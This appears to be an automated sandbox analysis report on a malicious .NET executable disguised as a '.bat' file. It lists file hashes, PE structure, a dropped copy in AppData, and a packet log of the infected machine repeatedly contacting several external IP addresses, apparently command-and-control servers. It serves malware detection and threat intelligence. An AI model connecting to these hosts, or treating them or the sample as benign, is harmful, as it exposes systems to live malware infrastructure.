C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe

Process:	C:\Users\user\Desktop\P1 HWT623ATG.bat.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	753664
Entropy (8bit):	7.905291471126653
Encrypted:	false
SSDEEP:	12288:e3qyJMgFKQK9RXZ18byY0Po42ki8BsG5llPjP/3DUhUMn9QVYT:e6OxFKQmRXAz8awlPjn3ohB9VT
MD5:	CFD86B8016C2604EA4B9CF22E6316E22
SHA1:	76BBD37B9FA76903785813AF01C9CFB913C6B7FF
SHA-256:	3E8A45E1F0FACE1DEDAB9167D1E0405000F94D1DFAF1780B45CBE315F1EAD0D4
SHA-512:	5C310750F9CEF44874E55776D574EAEC2C02413F87011B85E2EC153DBE0AF48B0AF8925780313211842A61E3361DBEFB6B8E2773F0A7A7A773862FB310B88FEB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._f..............0..P...(......^l... ........@.. ....................................@..................................l..O.................................................................................... ............... ..H............text...dL... ...P.................. ..`.rsrc............ ...X..............@..@.reloc...............x..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe:Zone.Identifier

Process:	C:\Users\user\Desktop\P1 HWT623ATG.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.905291471126653
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	P1 HWT623ATG.bat.exe
File size:	753'664 bytes
MD5:	cfd86b8016c2604ea4b9cf22e6316e22
SHA1:	76bbd37b9fa76903785813af01c9cfb913c6b7ff
SHA256:	3e8a45e1f0face1dedab9167d1e0405000f94d1dfaf1780b45cbe315f1ead0d4
SHA512:	5c310750f9cef44874e55776d574eaec2c02413f87011b85e2ec153dbe0af48b0af8925780313211842a61e3361dbefb6b8e2773f0a7a7a773862fb310b88feb
SSDEEP:	12288:e3qyJMgFKQK9RXZ18byY0Po42ki8BsG5llPjP/3DUhUMn9QVYT:e6OxFKQmRXAz8awlPjn3ohB9VT
TLSH:	BBF4121467B95701E1FC87F9586A01501B793A270A22C718CD86B9FA8DB5BD0DA0FF2F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._f..............0..P...(......^l... ........@.. ....................................@................................

File Icon


Icon Hash:	175198939250310f

Static PE Info

General

Entrypoint:	0x4b6c5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x665FC0A6 [Wed Jun 5 01:34:30 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb6c0c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb8000	0x1ec4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb4c64	0xb5000	dc28e5bd5294c5180180d9ba7a1de8f4	False	0.9382553522099447	data	7.925374523955337	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb8000	0x1ec4	0x2000	9569e8a892d973c8af3470e05f18d987	False	0.85888671875	data	7.362197869352215	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0xc	0x800	915c57ea3ad57737606a2e3509d4a25a	False	0.015625	data	0.02939680787012526	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb80c8	0x19f5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9736644093303235
RT_GROUP_ICON	0xb9ad0	0x14	data	1.05
RT_VERSION	0xb9af4	0x3cc	data	0.43930041152263377

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 5, 2024 18:26:59.768871069 CEST	49709	80	192.168.2.7	195.35.39.119
Jun 5, 2024 18:26:59.773996115 CEST	80	49709	195.35.39.119	192.168.2.7
Jun 5, 2024 18:26:59.774080992 CEST	49709	80	192.168.2.7	195.35.39.119
Jun 5, 2024 18:26:59.777451038 CEST	49709	80	192.168.2.7	195.35.39.119
Jun 5, 2024 18:26:59.782434940 CEST	80	49709	195.35.39.119	192.168.2.7
Jun 5, 2024 18:27:00.447798967 CEST	80	49709	195.35.39.119	192.168.2.7
Jun 5, 2024 18:27:00.447849989 CEST	80	49709	195.35.39.119	192.168.2.7
Jun 5, 2024 18:27:00.447989941 CEST	49709	80	192.168.2.7	195.35.39.119
Jun 5, 2024 18:27:00.449759007 CEST	80	49709	195.35.39.119	192.168.2.7
Jun 5, 2024 18:27:00.449810982 CEST	49709	80	192.168.2.7	195.35.39.119
Jun 5, 2024 18:27:00.452289104 CEST	49709	80	192.168.2.7	195.35.39.119
Jun 5, 2024 18:27:00.457153082 CEST	80	49709	195.35.39.119	192.168.2.7
Jun 5, 2024 18:27:16.674185991 CEST	49711	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:16.682948112 CEST	80	49711	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:16.683723927 CEST	49711	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:16.685231924 CEST	49711	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:16.690114021 CEST	80	49711	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:17.310480118 CEST	80	49711	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:17.326260090 CEST	80	49711	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:17.328511000 CEST	49711	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:18.196504116 CEST	49711	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:19.214577913 CEST	49712	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:19.219508886 CEST	80	49712	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:19.219583035 CEST	49712	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:19.221756935 CEST	49712	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:19.226660013 CEST	80	49712	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:19.857146978 CEST	80	49712	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:19.872884989 CEST	80	49712	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:19.872977018 CEST	49712	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:20.729641914 CEST	49712	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:21.745584011 CEST	49713	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:21.750602961 CEST	80	49713	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:21.750751019 CEST	49713	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:21.752670050 CEST	49713	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:21.757895947 CEST	80	49713	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:21.757910013 CEST	80	49713	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:22.385396004 CEST	80	49713	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:22.401343107 CEST	80	49713	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:22.401401043 CEST	49713	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:23.258172035 CEST	49713	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:24.279491901 CEST	49714	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:24.284749985 CEST	80	49714	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:24.284857988 CEST	49714	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:24.286741018 CEST	49714	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:24.291657925 CEST	80	49714	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:24.923527956 CEST	80	49714	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:24.923547029 CEST	80	49714	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:24.923558950 CEST	80	49714	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:24.923784971 CEST	49714	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:24.938735008 CEST	80	49714	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:24.938860893 CEST	49714	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:24.939716101 CEST	49714	80	192.168.2.7	162.241.2.254
Jun 5, 2024 18:27:24.944658041 CEST	80	49714	162.241.2.254	192.168.2.7
Jun 5, 2024 18:27:30.262658119 CEST	49715	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:30.268084049 CEST	80	49715	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:30.268214941 CEST	49715	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:30.270272017 CEST	49715	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:30.275346994 CEST	80	49715	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:31.207969904 CEST	80	49715	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:31.207988024 CEST	80	49715	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:31.208120108 CEST	49715	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:31.364223957 CEST	80	49715	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:31.364345074 CEST	49715	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:31.773678064 CEST	49715	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:32.794354916 CEST	49716	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:32.800364971 CEST	80	49716	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:32.800529957 CEST	49716	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:32.802828074 CEST	49716	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:32.807761908 CEST	80	49716	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:34.074812889 CEST	80	49716	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:34.074825048 CEST	80	49716	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:34.074837923 CEST	80	49716	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:34.074949980 CEST	49716	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:34.234865904 CEST	80	49716	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:34.235023975 CEST	49716	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:34.305052042 CEST	49716	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:35.324364901 CEST	49717	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:35.329343081 CEST	80	49717	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:35.329746962 CEST	49717	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:35.332253933 CEST	49717	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:35.337166071 CEST	80	49717	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:35.337332010 CEST	80	49717	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:36.265587091 CEST	80	49717	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:36.265603065 CEST	80	49717	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:36.265836000 CEST	49717	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:36.420886993 CEST	80	49717	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:36.421001911 CEST	49717	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:36.836203098 CEST	49717	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:37.854919910 CEST	49718	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:37.861160040 CEST	80	49718	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:37.861314058 CEST	49718	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:37.863272905 CEST	49718	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:37.868840933 CEST	80	49718	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:38.813507080 CEST	80	49718	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:38.867470026 CEST	49718	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:38.970807076 CEST	80	49718	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:38.970978975 CEST	49718	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:38.971862078 CEST	49718	80	192.168.2.7	185.137.235.103
Jun 5, 2024 18:27:38.976790905 CEST	80	49718	185.137.235.103	192.168.2.7
Jun 5, 2024 18:27:44.243237972 CEST	49719	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:44.248403072 CEST	80	49719	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:44.248500109 CEST	49719	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:44.250412941 CEST	49719	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:44.255422115 CEST	80	49719	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:45.705521107 CEST	80	49719	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:45.705542088 CEST	80	49719	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:45.705558062 CEST	80	49719	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:45.705576897 CEST	80	49719	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:45.705638885 CEST	49719	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:45.705670118 CEST	49719	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:45.705843925 CEST	80	49719	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:45.710813046 CEST	80	49719	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:45.710896015 CEST	49719	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:45.758213997 CEST	49719	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:46.776832104 CEST	49720	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:46.781707048 CEST	80	49720	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:46.781824112 CEST	49720	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:46.783699036 CEST	49720	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:46.788579941 CEST	80	49720	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:48.217691898 CEST	80	49720	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:48.217706919 CEST	80	49720	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:48.217719078 CEST	80	49720	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:48.217768908 CEST	49720	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:48.219086885 CEST	80	49720	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:48.219130993 CEST	49720	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:48.220009089 CEST	80	49720	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:48.273689985 CEST	49720	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:48.295803070 CEST	49720	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:49.319498062 CEST	49721	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:49.325797081 CEST	80	49721	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:49.325907946 CEST	49721	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:49.328383923 CEST	49721	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:49.334996939 CEST	80	49721	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:49.335004091 CEST	80	49721	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:50.729536057 CEST	80	49721	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:50.729581118 CEST	80	49721	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:50.729614019 CEST	80	49721	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:50.729720116 CEST	49721	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:50.731667042 CEST	80	49721	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:50.731786013 CEST	49721	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:50.838242054 CEST	49721	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:51.855578899 CEST	49722	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:51.907454967 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:51.907552004 CEST	49722	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:51.909708977 CEST	49722	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:51.914645910 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448247910 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448256016 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448262930 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448321104 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448333979 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448343992 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448352098 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448360920 CEST	49722	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:53.448367119 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448375940 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448388100 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.448466063 CEST	49722	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:53.448466063 CEST	49722	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:53.448532104 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.482141018 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:53.482333899 CEST	49722	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:53.483176947 CEST	49722	80	192.168.2.7	64.46.118.35
Jun 5, 2024 18:27:53.488173008 CEST	80	49722	64.46.118.35	192.168.2.7
Jun 5, 2024 18:27:59.667411089 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:27:59.672334909 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:27:59.672421932 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:27:59.675080061 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:27:59.679975033 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.696891069 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.696897984 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.696902037 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.696949005 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.696966887 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.697077036 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:00.697077036 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:00.697345018 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.697366953 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.697379112 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.697392941 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.697405100 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.697458029 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:00.697458029 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:00.702130079 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.760379076 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:00.901314020 CEST	80	49723	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:00.904752970 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:01.189558983 CEST	49723	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:02.199853897 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:02.205159903 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:02.205246925 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:02.207586050 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:02.212569952 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255146027 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255167007 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255179882 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255191088 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255211115 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:03.255280972 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255305052 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:03.255331039 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255472898 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:03.255767107 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255772114 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255793095 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255801916 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.255902052 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:03.260219097 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.305022955 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:03.458055973 CEST	80	49724	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:03.458352089 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:03.725115061 CEST	49724	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:04.730259895 CEST	49725	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:04.735177994 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:04.736524105 CEST	49725	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:04.740268946 CEST	49725	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:04.745130062 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:04.745317936 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763338089 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763436079 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763447046 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763458014 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763474941 CEST	49725	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:05.763503075 CEST	49725	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:05.763745070 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763753891 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763783932 CEST	49725	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:05.763792992 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763860941 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763864040 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763870955 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.763947964 CEST	49725	80	192.168.2.7	13.228.81.39
